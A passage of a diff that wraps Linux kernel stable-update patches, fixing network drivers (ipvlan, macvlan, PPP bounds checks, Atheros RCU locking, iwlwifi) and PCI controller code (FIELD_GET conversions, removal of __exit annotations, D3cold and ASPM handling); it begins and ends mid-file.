+ 		if (count >= limit)
+ 			break;
+ 
+-read_again:
+ 		buf1_len = 0;
+ 		buf2_len = 0;
+ 		entry = next_entry;
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index b29b7d97b7739..d447f3076e24a 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -411,7 +411,7 @@ struct ipvl_addr *ipvlan_addr_lookup(struct ipvl_port *port, void *lyr3h,
+ 	return addr;
+ }
+ 
+-static int ipvlan_process_v4_outbound(struct sk_buff *skb)
++static noinline_for_stack int ipvlan_process_v4_outbound(struct sk_buff *skb)
+ {
+ 	const struct iphdr *ip4h = ip_hdr(skb);
+ 	struct net_device *dev = skb->dev;
+@@ -453,13 +453,11 @@ out:
+ }
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+-static int ipvlan_process_v6_outbound(struct sk_buff *skb)
++
++static noinline_for_stack int
++ipvlan_route_v6_outbound(struct net_device *dev, struct sk_buff *skb)
+ {
+ 	const struct ipv6hdr *ip6h = ipv6_hdr(skb);
+-	struct net_device *dev = skb->dev;
+-	struct net *net = dev_net(dev);
+-	struct dst_entry *dst;
+-	int err, ret = NET_XMIT_DROP;
+ 	struct flowi6 fl6 = {
+ 		.flowi6_oif = dev->ifindex,
+ 		.daddr = ip6h->daddr,
+@@ -469,27 +467,38 @@ static int ipvlan_process_v6_outbound(struct sk_buff *skb)
+ 		.flowi6_mark = skb->mark,
+ 		.flowi6_proto = ip6h->nexthdr,
+ 	};
++	struct dst_entry *dst;
++	int err;
+ 
+-	dst = ip6_route_output(net, NULL, &fl6);
+-	if (dst->error) {
+-		ret = dst->error;
++	dst = ip6_route_output(dev_net(dev), NULL, &fl6);
++	err = dst->error;
++	if (err) {
+ 		dst_release(dst);
+-		goto err;
++		return err;
+ 	}
+ 	skb_dst_set(skb, dst);
++	return 0;
++}
++
++static int ipvlan_process_v6_outbound(struct sk_buff *skb)
++{
++	struct net_device *dev = skb->dev;
++	int err, ret = NET_XMIT_DROP;
++
++	err = ipvlan_route_v6_outbound(dev, skb);
++	if (unlikely(err)) {
++		DEV_STATS_INC(dev, tx_errors);
++		kfree_skb(skb);
++		return err;
++	}
+ 
+ 	memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
+ 
+-	err = ip6_local_out(net, skb->sk, skb);
++	err = ip6_local_out(dev_net(dev), skb->sk, skb);
+ 	if (unlikely(net_xmit_eval(err)))
+ 		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+-	goto out;
+-err:
+-	DEV_STATS_INC(dev, tx_errors);
+-	kfree_skb(skb);
+-out:
+ 	return ret;
+ }
+ #else
+diff --git a/drivers/net/macvlan.c b/drivers/net/macvlan.c
+index b8cc55b2d721c..012830d12fde6 100644
+--- a/drivers/net/macvlan.c
++++ b/drivers/net/macvlan.c
+@@ -771,7 +771,7 @@ static void macvlan_change_rx_flags(struct net_device *dev, int change)
+ 	if (dev->flags & IFF_UP) {
+ 		if (change & IFF_ALLMULTI)
+ 			dev_set_allmulti(lowerdev, dev->flags & IFF_ALLMULTI ? 1 : -1);
+-		if (change & IFF_PROMISC)
++		if (!macvlan_passthru(vlan->port) && change & IFF_PROMISC)
+ 			dev_set_promiscuity(lowerdev,
+ 					    dev->flags & IFF_PROMISC ? 1 : -1);
+ 
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 5b064a1de92f0..fc58e4afb38dd 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1479,6 +1479,7 @@ struct phylink *phylink_create(struct phylink_config *config,
+ 	pl->config = config;
+ 	if (config->type == PHYLINK_NETDEV) {
+ 		pl->netdev = to_net_dev(config->dev);
++		netif_carrier_off(pl->netdev);
+ 	} else if (config->type == PHYLINK_DEV) {
+ 		pl->dev = config->dev;
+ 	} else {
+diff --git a/drivers/net/ppp/ppp_synctty.c b/drivers/net/ppp/ppp_synctty.c
+index 18283b7b94bcd..94ef6f9ca5103 100644
+--- a/drivers/net/ppp/ppp_synctty.c
++++ b/drivers/net/ppp/ppp_synctty.c
+@@ -462,6 +462,10 @@ ppp_sync_ioctl(struct ppp_channel *chan, unsigned int cmd, unsigned long arg)
+ 	case PPPIOCSMRU:
+ 		if (get_user(val, (int __user *) argp))
+ 			break;
++		if (val > U16_MAX) {
++			err = -EINVAL;
++			break;
++		}
+ 		if (val < PPP_MRU)
+ 			val = PPP_MRU;
+ 		ap->mru = val;
+@@ -697,7 +701,7 @@ ppp_sync_input(struct syncppp *ap, const unsigned char *buf,
+ 
+ 	/* strip address/control field if present */
+ 	p = skb->data;
+-	if (p[0] == PPP_ALLSTATIONS && p[1] == PPP_UI) {
++	if (skb->len >= 2 && p[0] == PPP_ALLSTATIONS && p[1] == PPP_UI) {
+ 		/* chop off address/control */
+ 		if (skb->len < 3)
+ 			goto err;
+diff --git a/drivers/net/wireless/ath/ath10k/debug.c b/drivers/net/wireless/ath/ath10k/debug.c
+index c861e66ef6bc5..41f387e15dcd0 100644
+--- a/drivers/net/wireless/ath/ath10k/debug.c
++++ b/drivers/net/wireless/ath/ath10k/debug.c
+@@ -1139,7 +1139,7 @@ void ath10k_debug_get_et_strings(struct ieee80211_hw *hw,
+ 				 u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *ath10k_gstrings_stats,
++		memcpy(data, ath10k_gstrings_stats,
+ 		       sizeof(ath10k_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath10k/snoc.c b/drivers/net/wireless/ath/ath10k/snoc.c
+index cfcb759a87dea..4b7266d928470 100644
+--- a/drivers/net/wireless/ath/ath10k/snoc.c
++++ b/drivers/net/wireless/ath/ath10k/snoc.c
+@@ -828,12 +828,20 @@ static void ath10k_snoc_hif_get_default_pipe(struct ath10k *ar,
+ 
+ static inline void ath10k_snoc_irq_disable(struct ath10k *ar)
+ {
+-	ath10k_ce_disable_interrupts(ar);
++	struct ath10k_snoc *ar_snoc = ath10k_snoc_priv(ar);
++	int id;
++
++	for (id = 0; id < CE_COUNT_MAX; id++)
++		disable_irq(ar_snoc->ce_irqs[id].irq_line);
+ }
+ 
+ static inline void ath10k_snoc_irq_enable(struct ath10k *ar)
+ {
+-	ath10k_ce_enable_interrupts(ar);
++	struct ath10k_snoc *ar_snoc = ath10k_snoc_priv(ar);
++	int id;
++
++	for (id = 0; id < CE_COUNT_MAX; id++)
++		enable_irq(ar_snoc->ce_irqs[id].irq_line);
+ }
+ 
+ static void ath10k_snoc_rx_pipe_cleanup(struct ath10k_snoc_pipe *snoc_pipe)
+@@ -1089,6 +1097,8 @@ static int ath10k_snoc_hif_power_up(struct ath10k *ar,
+ 		goto err_free_rri;
+ 	}
+ 
++	ath10k_ce_enable_interrupts(ar);
++
+ 	return 0;
+ 
+ err_free_rri:
+@@ -1252,8 +1262,8 @@ static int ath10k_snoc_request_irq(struct ath10k *ar)
+ 
+ 	for (id = 0; id < CE_COUNT_MAX; id++) {
+ 		ret = request_irq(ar_snoc->ce_irqs[id].irq_line,
+-				  ath10k_snoc_per_engine_handler, 0,
+-				  ce_name[id], ar);
++				  ath10k_snoc_per_engine_handler,
++				  IRQF_NO_AUTOEN, ce_name[id], ar);
+ 		if (ret) {
+ 			ath10k_err(ar,
+ 				   "failed to register IRQ handler for CE %d: %d\n",
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index 38be646bc0214..b1067bcdf88a5 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -1621,14 +1621,20 @@ static void ath11k_htt_pktlog(struct ath11k_base *ab, struct sk_buff *skb)
+ 	u8 pdev_id;
+ 
+ 	pdev_id = FIELD_GET(HTT_T2H_PPDU_STATS_INFO_PDEV_ID, data->hdr);
++
++	rcu_read_lock();
++
+ 	ar = ath11k_mac_get_ar_by_pdev_id(ab, pdev_id);
+ 	if (!ar) {
+ 		ath11k_warn(ab, "invalid pdev id %d on htt pktlog\n", pdev_id);
+-		return;
++		goto out;
+ 	}
+ 
+ 	trace_ath11k_htt_pktlog(ar, data->payload, hdr->size,
+ 				ar->ab->pktlog_defs_checksum);
++
++out:
++	rcu_read_unlock();
+ }
+ 
+ static void ath11k_htt_backpressure_event_handler(struct ath11k_base *ab,
+diff --git a/drivers/net/wireless/ath/ath11k/wmi.c b/drivers/net/wireless/ath/ath11k/wmi.c
+index 3e0a47f4a3ebd..142b201052660 100644
+--- a/drivers/net/wireless/ath/ath11k/wmi.c
++++ b/drivers/net/wireless/ath/ath11k/wmi.c
+@@ -7729,6 +7729,8 @@ ath11k_wmi_pdev_dfs_radar_detected_event(struct ath11k_base *ab, struct sk_buff
+ 		   ev->detector_id, ev->segment_id, ev->timestamp, ev->is_chirp,
+ 		   ev->freq_offset, ev->sidx);
+ 
++	rcu_read_lock();
++
+ 	ar = ath11k_mac_get_ar_by_pdev_id(ab, ev->pdev_id);
+ 
+ 	if (!ar) {
+@@ -7746,6 +7748,8 @@ ath11k_wmi_pdev_dfs_radar_detected_event(struct ath11k_base *ab, struct sk_buff
+ 		ieee80211_radar_detected(ar->hw);
+ 
+ exit:
++	rcu_read_unlock();
++
+ 	kfree(tb);
+ }
+ 
+@@ -7775,15 +7779,19 @@ ath11k_wmi_pdev_temperature_event(struct ath11k_base *ab,
+ 	ath11k_dbg(ab, ATH11K_DBG_WMI,
+ 		   "pdev temperature ev temp %d pdev_id %d\n", ev->temp, ev->pdev_id);
+ 
++	rcu_read_lock();
++
+ 	ar = ath11k_mac_get_ar_by_pdev_id(ab, ev->pdev_id);
+ 	if (!ar) {
+ 		ath11k_warn(ab, "invalid pdev id in pdev temperature ev %d", ev->pdev_id);
+-		kfree(tb);
+-		return;
++		goto exit;
+ 	}
+ 
+ 	ath11k_thermal_event_temperature(ar, ev->temp);
+ 
++exit:
++	rcu_read_unlock();
++
+ 	kfree(tb);
+ }
+ 
+@@ -7993,12 +8001,13 @@ static void ath11k_wmi_gtk_offload_status_event(struct ath11k_base *ab,
+ 		return;
+ 	}
+ 
++	rcu_read_lock();
++
+ 	arvif = ath11k_mac_get_arvif_by_vdev_id(ab, ev->vdev_id);
+ 	if (!arvif) {
+ 		ath11k_warn(ab, "failed to get arvif for vdev_id:%d\n",
+ 			    ev->vdev_id);
+-		kfree(tb);
+-		return;
++		goto exit;
+ 	}
+ 
+ 	ath11k_dbg(ab, ATH11K_DBG_WMI, "wmi gtk offload event refresh_cnt %d\n",
+@@ -8015,6 +8024,8 @@ static void ath11k_wmi_gtk_offload_status_event(struct ath11k_base *ab,
+ 
+ 	ieee80211_gtk_rekey_notify(arvif->vif, arvif->bssid,
+ 				   (void *)&replay_ctr_be, GFP_ATOMIC);
++exit:
++	rcu_read_unlock();
+ 
+ 	kfree(tb);
+ }
+diff --git a/drivers/net/wireless/ath/ath9k/debug.c b/drivers/net/wireless/ath/ath9k/debug.c
+index fb7a2952d0ce8..d9bac1c343490 100644
+--- a/drivers/net/wireless/ath/ath9k/debug.c
++++ b/drivers/net/wireless/ath/ath9k/debug.c
+@@ -1333,7 +1333,7 @@ void ath9k_get_et_strings(struct ieee80211_hw *hw,
+ 			  u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *ath9k_gstrings_stats,
++		memcpy(data, ath9k_gstrings_stats,
+ 		       sizeof(ath9k_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+index c55aab01fff5d..e79bbcd3279af 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_debug.c
+@@ -428,7 +428,7 @@ void ath9k_htc_get_et_strings(struct ieee80211_hw *hw,
+ 			      u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *ath9k_htc_gstrings_stats,
++		memcpy(data, ath9k_htc_gstrings_stats,
+ 		       sizeof(ath9k_htc_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 618355ecd9d7b..caaf4d52e2c64 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -524,16 +524,20 @@ iwl_mvm_set_tx_params(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 			flags |= IWL_TX_FLAGS_ENCRYPT_DIS;
+ 
+ 		/*
+-		 * For data packets rate info comes from the fw. Only
+-		 * set rate/antenna during connection establishment or in case
+-		 * no station is given.
++		 * For data and mgmt packets rate info comes from the fw. Only
++		 * set rate/antenna for injected frames with fixed rate, or
++		 * when no sta is given.
+ 		 */
+-		if (!sta || !ieee80211_is_data(hdr->frame_control) ||
+-		    mvmsta->sta_state < IEEE80211_STA_AUTHORIZED) {
++		if (unlikely(!sta ||
++			     info->control.flags & IEEE80211_TX_CTRL_RATE_INJECT)) {
+ 			flags |= IWL_TX_FLAGS_CMD_RATE;
+ 			rate_n_flags =
+ 				iwl_mvm_get_tx_rate_n_flags(mvm, info, sta,
+ 							    hdr->frame_control);
++		} else if (!ieee80211_is_data(hdr->frame_control) ||
++			   mvmsta->sta_state < IEEE80211_STA_AUTHORIZED) {
++			/* These are important frames */
++			flags |= IWL_TX_FLAGS_HIGH_PRI;
+ 		}
+ 
+ 		if (mvm->trans->trans_cfg->device_family >=
+diff --git a/drivers/net/wireless/mac80211_hwsim.c b/drivers/net/wireless/mac80211_hwsim.c
+index db70cef854bc4..abcd165a62cfe 100644
+--- a/drivers/net/wireless/mac80211_hwsim.c
++++ b/drivers/net/wireless/mac80211_hwsim.c
+@@ -3021,7 +3021,7 @@ static void mac80211_hwsim_get_et_strings(struct ieee80211_hw *hw,
+ 					  u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *mac80211_hwsim_gstrings_stats,
++		memcpy(data, mac80211_hwsim_gstrings_stats,
+ 		       sizeof(mac80211_hwsim_gstrings_stats));
+ }
+ 
+diff --git a/drivers/net/wireless/microchip/wilc1000/wlan.c b/drivers/net/wireless/microchip/wilc1000/wlan.c
+index 58bbf50081e47..9eb115c79c90a 100644
+--- a/drivers/net/wireless/microchip/wilc1000/wlan.c
++++ b/drivers/net/wireless/microchip/wilc1000/wlan.c
+@@ -1492,7 +1492,7 @@ int wilc_wlan_init(struct net_device *dev)
+ 	}
+ 
+ 	if (!wilc->vmm_table)
+-		wilc->vmm_table = kzalloc(WILC_VMM_TBL_SIZE, GFP_KERNEL);
++		wilc->vmm_table = kcalloc(WILC_VMM_TBL_SIZE, sizeof(u32), GFP_KERNEL);
+ 
+ 	if (!wilc->vmm_table) {
+ 		ret = -ENOBUFS;
+diff --git a/drivers/net/wireless/purelifi/plfxlc/mac.c b/drivers/net/wireless/purelifi/plfxlc/mac.c
+index d3cdffbded693..87a4ff888ddd4 100644
+--- a/drivers/net/wireless/purelifi/plfxlc/mac.c
++++ b/drivers/net/wireless/purelifi/plfxlc/mac.c
+@@ -666,7 +666,7 @@ static void plfxlc_get_et_strings(struct ieee80211_hw *hw,
+ 				  u32 sset, u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS)
+-		memcpy(data, *et_strings, sizeof(et_strings));
++		memcpy(data, et_strings, sizeof(et_strings));
+ }
+ 
+ static void plfxlc_get_et_stats(struct ieee80211_hw *hw,
+diff --git a/drivers/parisc/power.c b/drivers/parisc/power.c
+index 6f5e5f0230d39..332bcc0053a5e 100644
+--- a/drivers/parisc/power.c
++++ b/drivers/parisc/power.c
+@@ -197,6 +197,14 @@ static struct notifier_block parisc_panic_block = {
+ 	.priority	= INT_MAX,
+ };
+ 
++/* qemu soft power-off function */
++static int qemu_power_off(struct sys_off_data *data)
++{
++	/* this turns the system off via SeaBIOS */
++	gsc_writel(0, (unsigned long) data->cb_data);
++	pdc_soft_power_button(1);
++	return NOTIFY_DONE;
++}
+ 
+ static int __init power_init(void)
+ {
+@@ -226,7 +234,13 @@ static int __init power_init(void)
+ 				soft_power_reg);
+ 	}
+ 
+-	power_task = kthread_run(kpowerswd, (void*)soft_power_reg, KTHREAD_NAME);
++	power_task = NULL;
++	if (running_on_qemu && soft_power_reg)
++		register_sys_off_handler(SYS_OFF_MODE_POWER_OFF, SYS_OFF_PRIO_DEFAULT,
++					qemu_power_off, (void *)soft_power_reg);
++	else
++		power_task = kthread_run(kpowerswd, (void*)soft_power_reg,
++					KTHREAD_NAME);
+ 	if (IS_ERR(power_task)) {
+ 		printk(KERN_ERR DRIVER_NAME ": thread creation failed.  Driver not loaded.\n");
+ 		pdc_soft_power_button(0);
+diff --git a/drivers/pci/controller/dwc/pci-exynos.c b/drivers/pci/controller/dwc/pci-exynos.c
+index ec56110055665..e5519978ba475 100644
+--- a/drivers/pci/controller/dwc/pci-exynos.c
++++ b/drivers/pci/controller/dwc/pci-exynos.c
+@@ -375,7 +375,7 @@ fail_probe:
+ 	return ret;
+ }
+ 
+-static int __exit exynos_pcie_remove(struct platform_device *pdev)
++static int exynos_pcie_remove(struct platform_device *pdev)
+ {
+ 	struct exynos_pcie *ep = platform_get_drvdata(pdev);
+ 
+@@ -431,7 +431,7 @@ static const struct of_device_id exynos_pcie_of_match[] = {
+ 
+ static struct platform_driver exynos_pcie_driver = {
+ 	.probe		= exynos_pcie_probe,
+-	.remove		= __exit_p(exynos_pcie_remove),
++	.remove		= exynos_pcie_remove,
+ 	.driver = {
+ 		.name	= "exynos-pcie",
+ 		.of_match_table = exynos_pcie_of_match,
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index 78818853af9e4..d2634dafb68e5 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -1101,7 +1101,7 @@ static const struct of_device_id ks_pcie_of_match[] = {
+ 	{ },
+ };
+ 
+-static int __init ks_pcie_probe(struct platform_device *pdev)
++static int ks_pcie_probe(struct platform_device *pdev)
+ {
+ 	const struct dw_pcie_host_ops *host_ops;
+ 	const struct dw_pcie_ep_ops *ep_ops;
+@@ -1303,7 +1303,7 @@ err_link:
+ 	return ret;
+ }
+ 
+-static int __exit ks_pcie_remove(struct platform_device *pdev)
++static int ks_pcie_remove(struct platform_device *pdev)
+ {
+ 	struct keystone_pcie *ks_pcie = platform_get_drvdata(pdev);
+ 	struct device_link **link = ks_pcie->link;
+@@ -1319,9 +1319,9 @@ static int __exit ks_pcie_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static struct platform_driver ks_pcie_driver __refdata = {
++static struct platform_driver ks_pcie_driver = {
+ 	.probe  = ks_pcie_probe,
+-	.remove = __exit_p(ks_pcie_remove),
++	.remove = ks_pcie_remove,
+ 	.driver = {
+ 		.name	= "keystone-pcie",
+ 		.of_match_table = ks_pcie_of_match,
+diff --git a/drivers/pci/controller/dwc/pcie-kirin.c b/drivers/pci/controller/dwc/pcie-kirin.c
+index d09507f822a7d..a824d8e8edb9d 100644
+--- a/drivers/pci/controller/dwc/pcie-kirin.c
++++ b/drivers/pci/controller/dwc/pcie-kirin.c
+@@ -742,7 +742,7 @@ err:
+ 	return ret;
+ }
+ 
+-static int __exit kirin_pcie_remove(struct platform_device *pdev)
++static int kirin_pcie_remove(struct platform_device *pdev)
+ {
+ 	struct kirin_pcie *kirin_pcie = platform_get_drvdata(pdev);
+ 
+@@ -819,7 +819,7 @@ static int kirin_pcie_probe(struct platform_device *pdev)
+ 
+ static struct platform_driver kirin_pcie_driver = {
+ 	.probe			= kirin_pcie_probe,
+-	.remove	        	= __exit_p(kirin_pcie_remove),
++	.remove	        	= kirin_pcie_remove,
+ 	.driver			= {
+ 		.name			= "kirin-pcie",
+ 		.of_match_table		= kirin_pcie_match,
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 2241029537a03..5d1ae2706f6ea 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -9,6 +9,7 @@
+  * Author: Vidya Sagar <vidyas@nvidia.com>
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/clk.h>
+ #include <linux/debugfs.h>
+ #include <linux/delay.h>
+@@ -324,8 +325,7 @@ static void apply_bad_link_workaround(struct dw_pcie_rp *pp)
+ 	 */
+ 	val = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKSTA);
+ 	if (val & PCI_EXP_LNKSTA_LBMS) {
+-		current_link_width = (val & PCI_EXP_LNKSTA_NLW) >>
+-				     PCI_EXP_LNKSTA_NLW_SHIFT;
++		current_link_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, val);
+ 		if (pcie->init_link_width > current_link_width) {
+ 			dev_warn(pci->dev, "PCIe link is bad, width reduced\n");
+ 			val = dw_pcie_readw_dbi(pci, pcie->pcie_cap_base +
+@@ -740,8 +740,7 @@ static void tegra_pcie_enable_system_interrupts(struct dw_pcie_rp *pp)
+ 
+ 	val_w = dw_pcie_readw_dbi(&pcie->pci, pcie->pcie_cap_base +
+ 				  PCI_EXP_LNKSTA);
+-	pcie->init_link_width = (val_w & PCI_EXP_LNKSTA_NLW) >>
+-				PCI_EXP_LNKSTA_NLW_SHIFT;
++	pcie->init_link_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, val_w);
+ 
+ 	val_w = dw_pcie_readw_dbi(&pcie->pci, pcie->pcie_cap_base +
+ 				  PCI_EXP_LNKCTL);
+@@ -900,7 +899,7 @@ static int tegra_pcie_dw_host_init(struct dw_pcie_rp *pp)
+ 	/* Configure Max lane width from DT */
+ 	val = dw_pcie_readl_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKCAP);
+ 	val &= ~PCI_EXP_LNKCAP_MLW;
+-	val |= (pcie->num_lanes << PCI_EXP_LNKSTA_NLW_SHIFT);
++	val |= FIELD_PREP(PCI_EXP_LNKCAP_MLW, pcie->num_lanes);
+ 	dw_pcie_writel_dbi(pci, pcie->pcie_cap_base + PCI_EXP_LNKCAP, val);
+ 
+ 	/* Clear Slot Clock Configuration bit if SRNS configuration */
+diff --git a/drivers/pci/controller/pci-mvebu.c b/drivers/pci/controller/pci-mvebu.c
+index 1ced73726a267..668601fd0b296 100644
+--- a/drivers/pci/controller/pci-mvebu.c
++++ b/drivers/pci/controller/pci-mvebu.c
+@@ -264,7 +264,7 @@ static void mvebu_pcie_setup_hw(struct mvebu_pcie_port *port)
+ 	 */
+ 	lnkcap = mvebu_readl(port, PCIE_CAP_PCIEXP + PCI_EXP_LNKCAP);
+ 	lnkcap &= ~PCI_EXP_LNKCAP_MLW;
+-	lnkcap |= (port->is_x4 ? 4 : 1) << 4;
++	lnkcap |= FIELD_PREP(PCI_EXP_LNKCAP_MLW, port->is_x4 ? 4 : 1);
+ 	mvebu_writel(port, lnkcap, PCIE_CAP_PCIEXP + PCI_EXP_LNKCAP);
+ 
+ 	/* Disable Root Bridge I/O space, memory space and bus mastering. */
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index 7aa1c20582ab8..2f5eddf03ac6a 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -911,7 +911,7 @@ pci_power_t acpi_pci_choose_state(struct pci_dev *pdev)
+ {
+ 	int acpi_state, d_max;
+ 
+-	if (pdev->no_d3cold)
++	if (pdev->no_d3cold || !pdev->d3cold_allowed)
+ 		d_max = ACPI_STATE_D3_HOT;
+ 	else
+ 		d_max = ACPI_STATE_D3_COLD;
+diff --git a/drivers/pci/pci-sysfs.c b/drivers/pci/pci-sysfs.c
+index dd0d9d9bc5097..df1c44a5c886c 100644
+--- a/drivers/pci/pci-sysfs.c
++++ b/drivers/pci/pci-sysfs.c
+@@ -12,7 +12,7 @@
+  * Modeled after usb's driverfs.c
+  */
+ 
+-
++#include <linux/bitfield.h>
+ #include <linux/kernel.h>
+ #include <linux/sched.h>
+ #include <linux/pci.h>
+@@ -230,8 +230,7 @@ static ssize_t current_link_width_show(struct device *dev,
+ 	if (err)
+ 		return -EINVAL;
+ 
+-	return sysfs_emit(buf, "%u\n",
+-		(linkstat & PCI_EXP_LNKSTA_NLW) >> PCI_EXP_LNKSTA_NLW_SHIFT);
++	return sysfs_emit(buf, "%u\n", FIELD_GET(PCI_EXP_LNKSTA_NLW, linkstat));
+ }
+ static DEVICE_ATTR_RO(current_link_width);
+ 
+@@ -530,10 +529,7 @@ static ssize_t d3cold_allowed_store(struct device *dev,
+ 		return -EINVAL;
+ 
+ 	pdev->d3cold_allowed = !!val;
+-	if (pdev->d3cold_allowed)
+-		pci_d3cold_enable(pdev);
+-	else
+-		pci_d3cold_disable(pdev);
++	pci_bridge_d3_update(pdev);
+ 
+ 	pm_runtime_resume(dev);
+ 
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 835e9ea14b3a1..8df156c28aade 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -717,15 +717,18 @@ u16 pci_find_vsec_capability(struct pci_dev *dev, u16 vendor, int cap)
+ {
+ 	u16 vsec = 0;
+ 	u32 header;
++	int ret;
+ 
+ 	if (vendor != dev->vendor)
+ 		return 0;
+ 
+ 	while ((vsec = pci_find_next_ext_capability(dev, vsec,
+ 						     PCI_EXT_CAP_ID_VNDR))) {
+-		if (pci_read_config_dword(dev, vsec + PCI_VNDR_HEADER,
+-					  &header) == PCIBIOS_SUCCESSFUL &&
+-		    PCI_VNDR_HEADER_ID(header) == cap)
++		ret = pci_read_config_dword(dev, vsec + PCI_VNDR_HEADER, &header);
++		if (ret != PCIBIOS_SUCCESSFUL)
++			continue;
++
++		if (PCI_VNDR_HEADER_ID(header) == cap)
+ 			return vsec;
+ 	}
+ 
+@@ -3710,14 +3713,14 @@ u32 pci_rebar_get_possible_sizes(struct pci_dev *pdev, int bar)
+ 		return 0;
+ 
+ 	pci_read_config_dword(pdev, pos + PCI_REBAR_CAP, &cap);
+-	cap &= PCI_REBAR_CAP_SIZES;
++	cap = FIELD_GET(PCI_REBAR_CAP_SIZES, cap);
+ 
+ 	/* Sapphire RX 5600 XT Pulse has an invalid cap dword for BAR 0 */
+ 	if (pdev->vendor == PCI_VENDOR_ID_ATI && pdev->device == 0x731f &&
+-	    bar == 0 && cap == 0x7000)
+-		cap = 0x3f000;
++	    bar == 0 && cap == 0x700)
++		return 0x3f00;
+ 
+-	return cap >> 4;
++	return cap;
+ }
+ EXPORT_SYMBOL(pci_rebar_get_possible_sizes);
+ 
+@@ -6135,8 +6138,7 @@ u32 pcie_bandwidth_available(struct pci_dev *dev, struct pci_dev **limiting_dev,
+ 		pcie_capability_read_word(dev, PCI_EXP_LNKSTA, &lnksta);
+ 
+ 		next_speed = pcie_link_speed[lnksta & PCI_EXP_LNKSTA_CLS];
+-		next_width = (lnksta & PCI_EXP_LNKSTA_NLW) >>
+-			PCI_EXP_LNKSTA_NLW_SHIFT;
++		next_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, lnksta);
+ 
+ 		next_bw = next_width * PCIE_SPEED2MBS_ENC(next_speed);
+ 
+@@ -6208,7 +6210,7 @@ enum pcie_link_width pcie_get_width_cap(struct pci_dev *dev)
+ 
+ 	pcie_capability_read_dword(dev, PCI_EXP_LNKCAP, &lnkcap);
+ 	if (lnkcap)
+-		return (lnkcap & PCI_EXP_LNKCAP_MLW) >> 4;
++		return FIELD_GET(PCI_EXP_LNKCAP_MLW, lnkcap);
+ 
+ 	return PCIE_LNK_WIDTH_UNKNOWN;
+ }
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 7e89cdbd446fc..5d1756f53ba84 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -1248,6 +1248,8 @@ static ssize_t aspm_attr_store_common(struct device *dev,
+ 			link->aspm_disable &= ~ASPM_STATE_L1;
+ 	} else {
+ 		link->aspm_disable |= state;
++		if (state & ASPM_STATE_L1)
++			link->aspm_disable |= ASPM_STATE_L1SS;
+ 	}
+ 
+ 	pcie_config_aspm_link(link, policy_to_aspm_state(link));
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 0945f50fe94ff..e19b79821dd6d 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -1643,15 +1643,15 @@ static void pci_set_removable(struct pci_dev *dev)
+ static bool pci_ext_cfg_is_aliased(struct pci_dev *dev)
+ {
+ #ifdef CONFIG_PCI_QUIRKS
+-	int pos;
++	int pos, ret;
+ 	u32 header, tmp;
+ 
+ 	pci_read_config_dword(dev, PCI_VENDOR_ID, &header);
+ 
+ 	for (pos = PCI_CFG_SPACE_SIZE;
+ 	     pos < PCI_CFG_SPACE_EXP_SIZE; pos += PCI_CFG_SPACE_SIZE) {
+-		if (pci_read_config_dword(dev, pos, &tmp) != PCIBIOS_SUCCESSFUL
+-		    || header != tmp)
++		ret = pci_read_config_dword(dev, pos, &tmp);
++		if ((ret != PCIBIOS_SUCCESSFUL) || (header != tmp))
+ 			return false;
+ 	}
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
